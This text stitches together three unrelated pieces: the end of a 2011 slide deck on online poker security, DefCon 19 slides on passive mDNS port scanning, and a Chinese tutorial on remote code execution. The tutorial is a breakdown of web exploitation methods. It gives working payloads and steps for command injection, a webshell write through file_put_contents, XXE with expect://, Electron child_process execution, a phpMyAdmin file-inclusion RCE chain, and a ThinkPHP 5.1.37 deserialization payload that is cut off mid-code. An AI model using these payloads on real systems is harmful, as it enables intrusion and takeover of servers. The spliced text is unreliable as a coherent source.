been included below for reference. This decision was the result of an extensive
and exhaustive review of your account activity on Full Tilt Poker.
Do not attempt to play on Full Tilt Poker in the future on a new or existing
account. If you are found playing on the site again, your account will be
suspended and all remaining funds will be forfeited.
We will not enter into any further discussion regarding this matter.
Regards
Security & Game Integrity
Full Tilt Poker
© SeNet International Corp. 2011
32
August 2011
SeNet
Turn
© SeNet International Corp. 2011
33
August 2011
SeNet
Online Poker Network Architecture
© SeNet International Corp. 2011
34
August 2011
SeNet
Online Poker Network Architecture
(Cont.)
© SeNet International Corp. 2011
35
August 2011
SeNet
Online Poker Network Architecture
(Cont.)
© SeNet International Corp. 2011
36
August 2011
SeNet
Online Poker Network Architecture
(Cont.)
© SeNet International Corp. 2011
37
August 2011
SeNet
Poker Client=Root Kit
While the poker client is not exactly
a root kit it does exhibit some of the
same characteristics. The online
companies argue this is for player
protection against cheating.
However, in doing this there is some
invasion of privacy. I don’t know
about you but I don’t like people to
know what web sites are in my
cache.
© SeNet International Corp. 2011
38
August 2011
SeNet
Poker Client Behind the Scenes
Lets take a look at what one of the poker clients is doing under the covers. Below
we list some of the interesting items that the Cake poker client performs.
•
Function Calls
EnemyWindowNames()
EnemyProcessNames()
EnemyProcessHashs()
EnemyDLLNames()
EnemyURLs ()
•
Examines the system from programs or services it deems unauthorized
•
OLLYDBG
•
POKEREDGE
•
POKERRNG
•
WINHOLDEM
•
OPENHOLDEM
•
WINSCRAPE
•
OPENSCRAPE
•
pokertracker
•
pokertrackerhud
•
HoldemInspector
•
HoldemInspector2
•
HoldemManager
•
HMHud
© SeNet International Corp. 2011
39
August 2011
SeNet
Poker Client Behind the Scenes
(Cont.)
Well-known modifications and behavior observed by online poker clients:
1.
Modification to the Windows host-based firewall policies which allows for automatically
authorizing various poker clients
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
\StandardProfile\AuthorizedApplications\List "C:\Program Files\Cake Poker 2.0\PokerClient.exe“
2.
Scanning the windows process table
-
Cake poker reads through each of your process after approximately 10-20 minutes of idle time
(Reading the .exe files in 4k increments) – based on Cake poker client 2.0.1.3386
3. Ability to read the body and title bar text from every window you have open.
- Extracts the window handles (HWND), caption, class, style and location of the windows.
4. Ability to detect mouse movements in order to determine human vs. automated movements.
- Mouse_event API / bots work the same way by writing custom mouse or keyboard drivers
© SeNet International Corp. 2011
40
August 2011
SeNet
Poker Client Behind the Scenes
(Cont.)
Additionally functionality found in poker clients:
1.
Poker applications scan for instances of winholdem/Bonus bots (Shanky
technologies) running on your workstation or VM instance.
2.
Poker clients monitor table conversation for lack of table talk and longevity of
sessions.
3.
Numerous tools to detect monitoring of your filesystem and registry can be used.
4.
Poker applications are known for monitoring Internet Caches for URL history
information.
5.
Cookie creation from just about every client.
© SeNet International Corp. 2011
41
August 2011
SeNet
Poker Client Behind the Scenes
(Cont.)
-
Cake Poker client is comprised of three main processes (CakePoker.exe,
PokerClient.exe, and CakeNotifier.exe).
-
The client scans itself during random intervals most likely protecting itself against
modification or patching of the executables.
-
Found the client (CakeNotifier.exe) also scanning directories containing packet
capture files and reflector ( a .NET decompiler)???
-
Cake poker’s executables are all obfuscated
-
PokerClient.exe is obfuscated – 12mb in size (huge – most likely encrypted).
-
Bodog verion 3.12.10.5 is only 4mb in size
© SeNet International Corp. 2011
42
August 2011
SeNet
Poker Client Behind the Scenes
(Cont.)
-
Bodog verion 3.12.10.5 file monitoring and registry activity
-
Prefetch files are created in C:\Windows\Prefetch
-
Digital certificate directory is created -
C:\Users\jd\AppData\LocalLow\Microsoft\Cryptnet\UrlCache (used for storing
certificates)
-
BPGame.exe modifies itself with new attributes
-
Reads through your URL cache
-
Loads images from Bodog poker installation directory
© SeNet International Corp. 2011
43
August 2011
SeNet
Poker Client Behind the Scenes
(Cont.)
Queries your registry
-
Looks in your
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
-
Queries your hardware settings on your workstation
-
Read User Shell folder – the user shell folder subkey stores the paths to Windows
Explorer folders for the current user of the computer.
-
TCP send request from localhost to 66.212.245.235 on port 80
-
(After SSL handshake) - TCP send request from localhost to 66.212.249.155 on port
7997
-
Session manager (HKLM\Sysstem\CurrentControlSet\Session manager
• Gets the environment variables of the machine
• Username
• Root directory of windows
• Tmp dir
• Path
• Operating system
© SeNet International Corp. 2011
44
August 2011
SeNet
Web Application Vulnerabilities
© SeNet International Corp. 2011
45
August 2011
SeNet
Web App Vulnerabilities (Cont.)
© SeNet International Corp. 2011
46
August 2011
SeNet
Web App Vulnerabilities (Cont.)
© SeNet International Corp. 2011
47
August 2011
SeNet
Web App Vulnerabilities (Cont.)
© SeNet International Corp. 2011
48
August 2011
SeNet
Web App Vulnerabilities (Cont.)
If you thought it took some advanced techniques… Fail.
•
Cross-site scripting heaven (persistent and reflective);
apparently the designers felt <script> might be needed
in numeric only fields.
•
Unvalidated redirects; where would you like poker sites
to take you?
•
Pretty much zero input validation.
•
Expired SSL certificates, not necessarily a vulnerability,
but seriously?
© SeNet International Corp. 2011
49
August 2011
SeNet
Authentication Vulnerabilities
While sophsticated attacks are fun, sometimes you just
need to go back to the basics. While some of the sites
offer multifactor authentication these are not standard
and cost extra. The sites differ widely in their
password complexity requirements.
Poker Site
Password Requirements
Carbon
Between 6-20 characters
Bodog
At least 5 characters
Cake
Between 8-14 and must contain the
following:
Lower case, upper case, number,
special character
Full Tilt
At least 5 characters
UB/Absolute
At least 6 characters
© SeNet International Corp. 2011
50
August 2011
SeNet
Authentication Vulnerabilities (Cont.)
With passwords this strong it must be impossible to
brute-force……
Especially with no account lockout
And login IDs fairly well known, thank you PTR
Can anybody say Hydra? Brutus?………
© SeNet International Corp. 2011
51
August 2011
SeNet
Authentication Vulnerabilities (Cont.)
Some poker sites use non-random
numbers as UID’s.
for uid in `seq 3830000 3840000`;do
echo $uid > users.txt;done
(1 Second later…)
Half the battle? Done
© SeNet International Corp. 2011
52
August 2011
SeNet
Attacking Supporting Infrastructure
Several businesses have developed supporting the poker
sites, these include:
•
Training sites (Cardrunners, Deuces Cracked)
•
Tracking sites (PTR, Sharkscope)
•
Media/Forums (Two+Two)
If these sites are used by online poker players could they
be leveraged in order to gain information or launch
target phishing accounts with the goal to install
malicious software in order to see their cards?
© SeNet International Corp. 2011
53
August 2011
SeNet
Attacking Supporting Infrastructure
(Cont.)
© SeNet International Corp. 2011
54
August 2011
SeNet
Attacking Supporting Infrastructure
(Cont.)
© SeNet International Corp. 2011
55
August 2011
SeNet
Attacking Supporting Infrastructure
(Cont.)
© SeNet International Corp. 2011
56
August 2011
SeNet
River
© SeNet International Corp. 2011
57
August 2011
SeNet
Online Poker Defenses - Application
•
Need to move away from password based
authentication and toward multifactor, because that
can’t be hacked right (RSA)?
•
Maybe implement simple things, say like account
lockout
•
Perform robust security testing and configuration
management
•
Only allow connections from specific geographic
locations
•
Adhere to certain standards (i.e. ISO, PCI, FISMA)
© SeNet International Corp. 2011
58
August 2011
SeNet
Online Poker Defenses – User
•
Have dedicated VM for
poker and only use it for
that purpose
•
Use antivirus/spyware
(D’oh)
•
Don’t play on insecure
wirelesses networks
•
Use strong, complex
passwords. Better use
multifactor
authentication where
available
•
Don’t use same password
across multiple sites
•
Monitor your traffic
© SeNet International Corp. 2011
59
August 2011
SeNet
Next Steps in Research
•
Continue digging deeper into the poker client
•
Custom client to bypass restrictions
•
Automated tool to brute-force poker passwords
•
More mapping out poker networks
•
In-depth look at web application vulnerabilities
© SeNet International Corp. 2011
60
August 2011
SeNet
Conclusion
•
While we did not uncover a smoking gun, based on
preliminary research there seems to be several areas
that do require strengthening and further exploration is
sure to identify more serious issues
•
Regulation and compliance is needed to attempt to
make companies develop and secure their gaming
networks
•
Do I feel safe playing?
© SeNet International Corp. 2011
61
August 2011
SeNet
Questions
Questions? | pdf |
DefCon 19, Las Vegas 2011
Port Scanning Without Sending Packets
Gregory Pickett, CISSP, GCIA, GPEN
Chicago, Illinois
[email protected]
Hellfire Security
Overview
How This All Started
It’s Not A Magic Trick
Loose Lips Sink Ships
Catch Me If You Can
Back To The Future
Suppose You Have This Guy On Your Network …
Suppose You Have This Guy On Your Network …
Suppose You Have This Guy On Your Network …
Host
Name?
Suppose You Have This Guy On Your Network …
Characterize
Profile
Asset or Intruder
Role
Function
Determination
10.111.128.55
nbtstat
Host Name
Suppose You Have This Guy On Your Network …
Characterize
Profile
Asset or Intruder
Role
Function
Determination
10.111.128.55
?
Host Name
What is all this multicast?
Me!
It’s Multicast DNS (mDNS)!
Purpose
Name Resolution (Peer-to-Peer)
History
AppleTalk Name Binding Protocol
Zero Configuration Networking
Development
Multicast DNS
DNS-Service Discovery
Features
Messages
Same formats and operating
semantics as conventional DNS
Based on “local” domain
Shared and unique records
Operations
Queries and responses sent to
224.0.0.251
Utilizes UDP port 5353 for
both resolvers and responders
Usage
Probe
Announcement
- Startup -
- For those resource records that it desires to be unique on the local link
- Proposed questions in the Authority Section as well
- Any “Type” record
- All shared and unique records in answer section
- Unique have their cache-flush bit set
- Repeated any time should rdata change
- Unsolicited response
(query)
(response)
224.0.0.251
224.0.0.251
Usage
Querying
Responding
- Resolution -
- One-shot queries, and continuous ongoing queries
- Source port determines compliance level of the resolver
- Fully compliant resolvers can receive more than one answer
- Known answer suppression
- Truncation is used for large known answer set
- Mutlicast or unicast response per the query parameter
- Unicast queries are always treated as having the “QU” bit set
- Cache-flush bit indicates an authoritative answer
- No queries in any response
224.0.0.251
224.0.0.251
10.15.36.251
(multicast)
(unicast)
Or
Usage
Goodbye
- Resolution -
- Used for changes on “Shared” records
- Not needed for unique records because of the cache-flush bit
(query)
224.0.0.251
Implementations
Apple
Rendezvous
Bonjour
Apple
Windows
Avahi
Linux
Others
Names
“PTR” Record
135.148.16.172.in-addr.arpa
7.A.F.A.E.B.E.F.F.F.A.4.6.2.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa
“A” Record
NPIBB0A88.local
“AAAA” Record
NPIBB0A88.local
Services
“PTR” Record
_ipp._tcp.local
“SRV” Record
HP Color LaserJet 4700 [10080F]._ipp._tcp.local
HP Color LaserJet 4700 [96E411]._ipp._tcp.local
HP Color LaserJet 4700 [96E411]._ipp._tcp.local
Other
“TXT” Record
HP Color LaserJet 4700 [808EDF]._ipp._tcp.local
“HINFO” Record
timur.local
localhost.local
DNS-Service Discovery
Works over standard and multicast DNS
Fully Compliant
Continuous Querying
Shared “PTR” records
Unique “SRV” and “TXT” records
Probe
Query, “A” Record
User
Response, “A” Record
User
User
User
User
Query, “PTR” Record
Response, “PTR” Record
Query, “SRV” Record
Response, “SRV” Record
Grabbing Information from an mDNS Responder
mDNSHostName
Parameters (-t:Target)
Reverse lookup of the IPv4 address
Operates using a unicast legacy query to UDP port
5353 of the target
mDNSLookup
Parameters [-t:Target] [-q:Question] [-r:Record Type]
Submits the question as given
Also operates using a unicast legacy query to UDP
port 5353 of the target …
Demonstration
But wait ...
Isn’t this just flowing to my interface on it’s own?
OK … I could do some really cool things with this!
What could I do?
Me!
Information Gathering
Host Thank you!
Host Thank you!
Service Thank you!
Service Thank you!
Service Thank you!
Service Thank you!
Host Thank you!
Service Thank you!
Service Thank you!
Requirements
Must have active responders (someone offering)
Connected to same switch as other resolvers (someone
asking)
Or
Join yourself (if you must) to the multicast group
Works best on a busy network … because you need hosts
out there asking a lot of questions so that you can collect
the most answers!
First Cool thing … Host Discovery!
mDNSDiscovery
Parameters [-t:Range]
Reports on any host communicating to 224.0.0.251
Doesn’t join the group … only picks up traffic for the
multicast group that is forwarded to all ports by the
switch
Demonstration
End result?
Completely silent, passive
host discovery
Network
Security Guy!
Why don’t you
go active so I
can catch you!
But wait, there’s more …
Second Cool thing … Port Scanning!
Legitimate hosts performing (in essence) port
scans with one packet
Couldn’t I perform a port scan with no packets?
That’s right … two, two products in one!
Is it magic?
It’s “Zero Configuration” Networking!
So Let’s Do This …
DNS-Service Discovery occurs continuously over
the network
Listen for it over multicast DNS on the local link
Don’t rely on known service records … it’s too
limiting
When a host responds to a discovery request …
report all the SRV record ports in it’s replies as
ports open on that host
So Let’s Do This …
mDNSScan
Parameters [-t:Range] [-p:Ports]
Currently 22 services over 18 ports have been seen
and identified using this method
Many more are possible based on the exhaustive list
available
Doesn’t join the group either …
Demonstration
This is what our sensors see …
… in a typical active scan
And what do our network sensors see …
Me!
… during this passive scan
Me!
Nothing!
What does this mean?
Network
Security Guy!
We are still
unhappy!
Completely silent, passive
port scans
OK, what else?
Unique Implementations
Unique Records
Unique Sets
Could this be used to fingerprint?
Yes … yes, it could
Linux
_services._dns-sd._udp.local Avahi
_workstation._tcp.local (SRV) Linux
Apple
_services._dns-sd._udp.local Bonjour
_afpovertcp._tcp.local (SRV,TXT) Apple
_device-info._tcp.local (TXT)
Yes … yes, it could
Printers
_ipp._tcp.local (SRV, TXT) Printer
_printer._tcp.local (SRV, TXT) Printer
_pdl-datastream._tcp.local (SRV, TXT) Printer
Network Attached Storage (Seagate)
_blackarmor4dinfo._udp.local (SRV,TXT) NAS, Seagate
_blackarmor4dconfig._tcp.local (SRV, TXT)
IP Cameras (Axis)
_axis-video._tcp.local (SRV) IP Camera, Axis
Profiling, “TXT” Records
Linux
Apple
Profiling, “TXT” Records
Printer
User
Profiling, “TXT” Records
Network Attached Storage (Seagate)
Profiling, “TXT” Records
IP Camera (Axis)
Someday … mDNSFingerprint
Build database of identifying record sets
Collect all incoming records and organize by host
Match against database and extract configuration
information
Return identity and configuration information for
each host
Limitations
Multicast
Routers between the recipient and the source must be
multicast enabled
mDNS
Querying (Link-Local Response Only)
Responses only accepted from local-link
Responses only sent to the local-link
Listening (Layer-2 Boundaries)
Broadcast Domain
VLAN containment
Sensors
Intrusion Detection/Prevention Systems
Etherape
Netflow/StealthWatch
Detect
Other detection possibilities
Monitoring
IGMP (group membership)
mDNS (responders)
Management Applications?
Defenses (Host)
Anti-Virus/Anti-Spyware/Anti-Spam
Intrusion Prevention System
Firewall and Port Blocking
Application Control
Device Control
Others
Do these help any?
Defenses (Network)
Firewalls/Access Control Lists
Network Access Control
VLANs
How about these?
What can we do then?
IGMP
Implement IGMP snooping
Authenticate group membership (IGAP)
Track members (Membership reports)
What can we do then?
Multicast DNS
Locate mDNS responders
Disable the service
Harden the box … in particular the services that
are offered
Sanitize records
Plan of Attack
Hunt down mDNS responders with these tools
Remove them or harden them
Implement any controls you have for multicast in
your environment
IGMP snooping/MLDv2
IGAP or IPv6 multicast authentication mechanisms
Other Protocols
Simple Service Discovery Protocol (SSDP)
Microsoft’s Answer to “Zero Configuration”
networking
HTTP-Based but also multicasted
Methods: NOTIFY, M-SEARCH
Link Local Multicast Name Resolution (LLMNR)
Another Microsoft solution
DNS-Based but also multicasted
Both less developed, but still in use
Final Thoughts
Hosts are now actively advertising their available
attack surfaces to anyone listening on the
network
Great for passive information gathering
Can be controlled to limit your exposure
But ultimately …This is not for the enterprise
Demonstration
Tools
mDNSHostName v1.00 for Windows
MD5: e97b2c8325a0ba3459c9a3a1d67a6306
mDNSLookup v1.00 for Windows
MD5: f489dd2a9af1606dd66a4a6f1f77c892
mDNSDiscovery v1.00 for Windows
MD5: e6c8c069989ec0f872da088edbbb1074
mDNSScan v1.00 for Windows
MD5: eb764b7f0ece697bd8abbea6275786dc
Updates http://mdnstools.sourceforge.net/
Links
http://www.multicastdns.org/
http://www.dns-sd.org/
http://www.ietf.org/id/draft-cheshire-dnsext-multicastdns-14.txt
http://www.ietf.org/id/draft-cheshire-dnsext-dns-sd-10.txt
http://www.ietf.org/id/draft-cheshire-dnsext-special-names-01.txt
http://www.rfc-editor.org/rfc/rfc3927.txt
http://www.bleepsoft.com/tyler/index.php?itemid=105
http://www.dns-sd.org/ServiceTypes.html
http://www.zeroconf.org/
http://avahi.org/
http://meetings.ripe.net/ripe-55/presentations/strotmann-mdns.pdf
http://www.mitre.org/work/tech_papers/2010/09_5245/09_5245.pdf | pdf |
目录
0 前言与基础概念
1 exec 无过滤拼接 RCE 易
2 任意文件写入 RCE 易
3 文件上传 RCE 中
4 任意登录后台+后台 RCE 易
5 SQL 语句执行+写入权限+绝对路径 RCE 易
6 XSS+electron RCE 易
7 XXE+php 协议 RCE 易
8 SSRF+远程文件下载 RCE 中
9 文件包含 RCE 中上
10 反序列化 RCE 难
11 表达式注入 RCE 中上
12 JNDI 注入 RCE 中上
13 JDBC+反序列化 RCE 中上
14 SSTI 注入 RCE 易
15 缓冲区溢出 RCE 难
16 php 环境变量注入 RCE 难
17 POC/EXP 编写 易
18 Bypass 笔记 易
前言与基础概念
RCE 全称 remote command/code execute
远程代码执行和远程命令执行,那么 RCE 的作用呢?就相当于我可
以在你的电脑中执行任意命令,那么就可以进而使用 MSF/CS 上线你
的主机,就可以完全控制你的电脑了,所以做渗透中,个人认为危害
最大的就是 RCE,你 SQL 注入,我有 RCE 直接连接数据库,你有未
授权/信息泄露,我直接查看这些信息,你有 XSS,我直接改源码,你
有弱口令,我直接扒下来电脑里存储的密码,大多数漏洞能做到的,
RCE 都可以轻而易举的做到,所以我在做挖洞或代审的时候也更会偏
向 RCE 的挖掘,而我在网上发现 RCE 的利用方式有很多,并且像是
XSS 到 RCE,XXE 到 RCE 这种小众的利用手段有很多人都不知道,于
是就有了此文,也算是自己的一个简单笔记总结文章吧,这篇文章写
的我个人认为很全面了几乎涵盖大部分的 RCE 利用手段了,肯定还
有很小众的 RCE 我没发现,不过全面的坏处就是不够深,都是比较浅
的东西,想深入的还是多搜点其他大佬的文章吧
基础的 shell 符号概念
cmd1 | cmd2 只执行 cmd2
cmd1 || cmd2 只有当 cmd1 执行失败后,cmd2 才被执行
cmd1 & cmd2 先执行 cmd1,不管是否成功,都会执行 cmd2
cmd1 && cmd2 先执行 cmd1,cmd1 执行成功后才执行 cmd2,否
则不执行 cmd2
Linux 还支持分号(;),cmd1;cmd2 按顺序依次执行,先执行 cmd1
再执行 cmd2
php 中也可以用反引号 echo `whoami`;
exec 无过滤拼接 RCE
首先是黑盒,平常我们看到了敏感的参数,比如 ping 啊,traceroute
等测试连通性的,百分之80都基本都有命令拼接(但不一定有RCE),
我们以某网关当例子
看到了 ping 和 traceroute,输入 127.0.0.1 和 1
然后抓包,第一个包,记住这个 sessionid,要在第二个包的 post 中
添加过去
第二个包,我们发现参数过滤了
没有关系,用 traceroute 试试
可以看到,拼接数据包的时候并没有过滤,这样我们就拿下 rce 了
那要是有源代码的话我们该如何审计呢,这里以某管理平台做例子,
call_function参数直接post进来,然后switch判断是ping还是tracert,
两边都一样,cmd 直接拼接了 post 的参数,然后 exec 直接输出
那么直接构造参数就可以造成 rce
我们除了 exec,还可以全局搜索 system,shell_exec 等命令函数,原
理一样不在赘述,以下为某防火墙的小通杀
任意文件写入
当然,这些只是单纯的执行命令,在 php 中还有 file_put_contents 这
种可以写入的函数,例子如下,这是之前 bc 站的源码,应该是一个
小后门,google88990 接受传参,然后 file_put_contents 直接拼接进去,
写入文件
直接构造 payload
xxx/xxx/xxx/xx/xxx/GoogleChartMapMarker.php?google88990=phpin
fo();
就可以直接 getshell 了
文件上传
大家用的最最常见的 rce 方法应该就是文件上传了,这里拿我之前写
过的一篇作为案例
这里下载源代码 RiteCMS - download
访问 admin.php,然后输入默认账密 admin admin,再次访问
admin.php 进入后台
File Manager
Upload file
选择文件
OK-Upload file
Admin.php 中,进入到 filemanage.inc.php 文件
进入之后看到fileupload函数,这里new一个类,把对象赋值到upload,
然后全局搜索
这里赋值了 upload 和 uploaddir 参数
继续往下走
在
73
行 有
move_uploaded_file
函 数 进 行 上 传 , 前 面 的
$this->upload[‘tmp_name’]是之前上传的文件临时文件夹的后缀名,
后面的$this->uploadDir.$tempFileName 是 BASE_PATH.$directory.’/’
然后回到刚刚的 filemanager.inc.php 文件
看到 base_path,我们再去全局搜索一下
在 settings.php 文件中可以到,返回了绝对路径的上一级目录
然后跟踪 directory 参数
这里的目录是不固定的,如果判断为 true,则是/files,如果为 false,
则 是/media
然后继续往下走
如果为 false 进入 else 语句,调用 savefile 函数
这里的 filename 和 file_name 是一样的
该函数直接用 copy 函数将临时文件复制到后面的文件中,成功拿下
rce
这是 copy 函数中的参数来源
任意登录后台+后台 RCE
当然,有的时候可能会进行鉴权,比如只有在后台的时候才可以使用
xx 方法,xx 功能,那么我们要配合信息泄露或者未授权进行组合
combo,如下
我们可以看到,在 shell_exec 前会判断是否登录了
那么我们只要有方法不需要实际的账号密码可以进入后台,那么就是
个前台 rce,如下,只需要密码为 hassmedia 就可以成功的进入后台
SQL 语句执行+写入权限+绝对路径
还有一种常见的拿 shell 手段是利用 sql 语句,如下
某次渗透过程中扫描到了一个 3.txt 文件
可以看到有了绝对路径,那么我们现在就是需要找到 sql 注入点或者
能执行 sql 的方法,访问 phpmyadmin 的时候直接进去了
权限有了,执行点有了,绝对路径也有了,接下来就是常规的写 shell
原理就不赘述了,把两个重要语句贴下面了
当然,如果是 sqlserver 可以直接用 xp_cmdshell
XSS+electron
Sql 到 rce 都有了,那么为何不试试 xss 到 rce 呢?先安装好 node.js
和 electron
使用 npm 下载的话会比较慢,这里可以用另一种方法
npm install -g cnpm --registry=https://registry.npm.taobao.org
cnpm install electron -g
成功安装,然后开始搭建环境
三个文件搭建好,然后 npm run start 就可以了
那么如何利用这个去 rce 呢,简单的一句话,在 index.js 中如下
const exec = require('child_process').exec
exec('calc.exe', (err, stdout, stderr) => console.log(stdout))
下图可以看到成功弹出计算器,造成 rce,那么我们在能 xss 的情况
下,控制前端代码,并且是 electron 框架的时候,即可造成 rce
大家所熟知的 xss 到 rce 应该就是某剑了,不过因为已经有很多大哥
都写过文章了,这里就不在赘述了,感兴趣的可以去查一查,除了某
剑还有某 by 也曾爆出过 rce
https://evoa.me/archives/3/#%E8%9A%81%E5%89%91%E5%AE%A2%E6%8
8%B7%E7%AB%AFRCE%E7%9A%84%E6%8C%96%E6%8E%98%E8%BF%87%E7%
A8%8B%E5%8F%8AElectron%E5%AE%89%E5%85%A8
如果使用 shell.openExternal 那段,命令里面只能使用 file 打开,或者
打开网站,可利用性太小
打开个计算器还是没啥问题的
顺便说一下,网上很多都是用 child_process,然后 export function,
但是我实测后发现并不能复现不了,各位师傅可以去看看,最简化版
应该就是以下这两行了
const exec = require('child_process').exec
exec('calc.exe')
XXE+php 协议
除了 xss 还有一种就是 xxe 到 rce,这里为了方便就不在本地搭环境
了,随便网上找了个靶场去打,可以看到数据是由 xml 进行传输的,
那么我们只要注入恶意 payload 即可造成 xxe 攻击
但这种情况下,只能造成任意文件读取,xxe 跟 xss 一样,都需要特
定的环境才可以造成 rce,比如说配合 php 的协议,expect 等
那么我们的语句就可以变成
<!ENTITY xxe SYSTEM "expect://id" >]>
也就造成了 rce(懒得配环境了,感兴趣的可自行测试)
SSRF+远程文件下载
还有一种 rce 的方式,是利用 ssrf 配合远程文件下载造成的 rce,如
下,搭建好网站
分析代码,我们可以看到函数 downloadImage 中,有个 readfile,此
处无过滤,这里就是一个简单的 ssrf,但是在 769 行还有一个
imageStream
我们跟进来发现其中有个 file_put_contents,可以直接造成远程文件
下载后写入
有了逻辑我们就可以简单的构造数据包如下:
成功写入
文件包含
(组合拳 0day 分析与 phpmyadmin 分析)
我们再换一种思路,尝试利用文件包含组合拳 getshell,以下用某设
备的 0day 做示例
全局搜索 include,发现一处可控的文件包含,这是直接 post 进来的
然 后 再 次 全 局 搜索 file_put_contents , 看 看 哪 里 可 以写 入 , 在
set_authAction 中找到了如下利用点,userName 可控,fileCntent 可
控,filename 直接拼接 userName
那么 AUTH_DIR 和 DS 呢?这两个参数在最开始的时候已经定义了,
DS 为分隔符,然后 AUTH_DIR 拼接
但文件包含仅限于/tmp/app_auth/cfile/,我们需要找到一个能创建目
录的利用点,全局搜索 mkdir,发现 dir 可控,shell 直接创建了,那
么整个漏洞逻辑就出来了
先逐级创建目录
Post
创建目录 store=/tmp/app_auth&isdisk=1
Post 创建目录 store=/tmp/app_auth/cfile&isdisk=1
post
写
入
文
件
数
据
serName=../../tmp/app_auth/cfile/sb&auth=<?php phpinfo(); ?>
Post 数据包含 cf=sb.txt
成功 getshell
以上是文件包含+txt 文件任意写入+目录创建的组合拳
还有一个是最近爆出来的 0day,phpmyadmin 文件包含后台 RCE,不
过现在应该打了补丁,但是分析文章还没出来,算是 1day 吧
复现步骤
1
CREATE DATABASE test; CREATE TABLE test.bar ( baz VARCHAR(100)
PRIMARY KEY ); INSERT INTO test.bar SELECT '<?php phpinfo(); ?>';
2
然后点 test 库,再执行 sql
CREATE TABLE pma__userconfig ( id int(11) NOT NULL, id2 int(11)
NOT NULL, config_data text NOT NULL, timevalue date NOT NULL,
username char(50) NOT NULL ) ENGINE=MyISAM DEFAULT
CHARSET=latin1;
3
INSERT INTO pma__userconfig (id, id2, config_data, timevalue,
username)
VALUES
(1,
2,
'{\"DefaultTabDatabase\":\"..\/..\/Extensions\/tmp\/tmp\/sess_inhi60cj
t8rojfmjl71jjo6npl\",\"lang\":\"zh_CN\",\"Console\/Mode\":\"collapse\
"}', '2022-05-07', 'root');
删除 cookie
访问主页登录进去
登录进来之后访问两次
http://localhost/phpmyadmin4.8.5/index.php?db=test
成功 RCE
下面就是代审环节:
入口点
index.php 中用了 Config 文件
Config.php 文件中使用了 require 包含了 common.inc.php 文件
在 lib/common.inc.php 中我们可以看到又包含了另一个目录的
common.inc.php
跟进去我们可以看到 453 行代码
这里有一个 loadUserPreferences 函数,是用来加载用户数据库里面
的内容,全局搜索找到该函数位置
第 972 行使用了 load 函数
跟进来
前面的入口流程就这么多,接下来就是核心分析,打上断点动态
debug 调试
我们可以看到第一行有 getRelationsParam,f7 跟进去,我们可以看
到该函数是读取 sessions 的一些数据,如下
然后 return 回来
然后跟下来是 backquote 函数,f7 进去
进行拼接 test 和 pma__userconfig
然后就往下走到 88-92 进行拼接 sql 语句
然后就是 93 行的 fetchSingleRow 函数,继续跟进来
这里的 config_data 获取到了路径
Return 回来
然后会对 config_data 表进行 json_decode 处理
这里会进入一个 readConfig 函数
然后跳过一些意义不大的函数
到这里会给 prefs 一个赋值
然后就是给 config_data 赋值
路径就传过来了
953 行会 global 一个 cfg,并传过来 config_data
这里就是我们的漏洞点了,如下
我们跟进 Util 中的 getScriptNameForOption 函数,如下
Location 是 database 不是 server,于是跳过该条件判断,并且注意此
时带过来的 target 是我们的 sessions 路径
此时可以看到 switch 中没有能跟路径匹配的
于是原路返回我们的 target
进行包含
成功 RCE
反序列化 RCE
接着我们来分析难度较高的反序列化+RCE,因为目前反序列化的文
章并不是很多,所以这里先说一下基础概念
先来看一下这段代码,基本的注释我已经在上面写好了,大家过一下
就行,现在说一下几个点
1 输出的变量 zactest 为什么变成了 zaczactest?
这是因为定义$zactest 的时候用的是 private 方法,我们看下面这段
话
private 是私有权限,他只能用在 zac 类中,但是在序列化后呢,为了
表明这个是我独有的,他就必须要在定义的变量之前加上自己的类名
2 zaczactest 明明是 10 个字符,为什么显示 12 个?
这是因为私有化属性序列化的格式是%00 类名%00 属性名,类名就
是 zac,属性名就是 zactest,在这当中分别插入两个%00,所以就多
出了两个字符,但为啥没显示出来呢?这是因为%00 是空白符
3 为什么 zac 变量前要加上一个*,并且字符数是 6
这个同理 2,因为是 protected 方法赋值的$zac,所以它也有相应的
格式,protected 格式为%00*%00 属性名,这也是为什么 zac 变量前面
要加上一个*,并且字符数是 6 的原因了
4 那除了这两个方法,public 有什么特性呢?
前面俩兄弟都有相应的序列化格式,但是 public 没有,该是多少就
是多少,他的特性就是 public 是公有化的,所以 public 赋值的变量可
以在任何地方被访问
然后就是实例复现,安装 thinkphp5.1.37,然后将 framework 改名为
thinkphp 放到,tp5.1.37 的目录里
https://github.com/top-think/framework/releases/tag/v5.1.37
https://github.com/top-think/think/releases/tag/v5.1.37
因为我对反序列化也不是特别熟悉,所以以下基本完全参照该文章
https://www.cnblogs.com/xueweihan/p/11931096.html
不过稍微修改了一些,比如过程中的一些方法,还有最后的动态审计
部分,并且这篇文章中的 poc 我也是没复现成功,最后找到其他大佬
发出来的 poc 复现成功的
(如侵权私聊我)
全局搜索_destruct
可以看到 desturct 有一个 removeFiles,跟进
我们可以看到其中有一个 file_exists,那么当 filename 是一个对象的
时候,就会调用 toString
全局搜索 toString
发现 toString 里面只有个 toJson,继续跟进
发现有个 toArray,跟进去
往下翻,看到这几行代码,$this->append 的键名是 key,name 可控
那么 188 行的 realtion 呢?跟进 getRelation 试试
我们可以看到在 toArray 函数中的第 201 行,判断!relation,那么想
进来这个 if 里,就要让$this->relation 返回空之类的,让 key 不在
$this->relation
跟下去 getAttr
跟进 getData
我们只需要让$this->data 中 有 $key 这个键,然后让 getAttr() 函
数 486 行 下 面的 if 判 断 都 没 有 , 就 可 以 直 接 使 $relation =
$this->data[$key] ;
那么$this->data 可控,$key 也是可控的($this->append 中的 键名),
所以 $relation 也是可控的
我们接着全局搜索__call
看到了 call_user_func_array,发现我们可以完全控制住第一个参数
那么我们现在就需要找到这类函数,比如 input
但这里我们只能去找间接调用 input 的方法,全局搜索$this->input,
找到 param 函数
我们在当前目录搜索哪里调用了 param 这个函数,看到了 isAjax
然后开始进行漏洞复现,首先在
\application\index\controller\Index.php
文件添加一个反序列化入口
然后我们构建一个 payload
<?php
namespace think;
abstract class Model{
protected $append = [];
private $data = [];
function __construct(){
$this->append = ["ethan"=>["dir","calc"]];
$this->data = ["ethan"=>new Request()];
}
}
class Request
{
protected $hook = [];
protected $filter = "system";
protected $config = [
// 表单请求类型伪装变量
'var_method' => '_method',
// 表单 ajax 伪装变量
'var_ajax' => '_ajax',
// 表单 pjax 伪装变量
'var_pjax' => '_pjax',
// PATHINFO 变量名 用于兼容模式
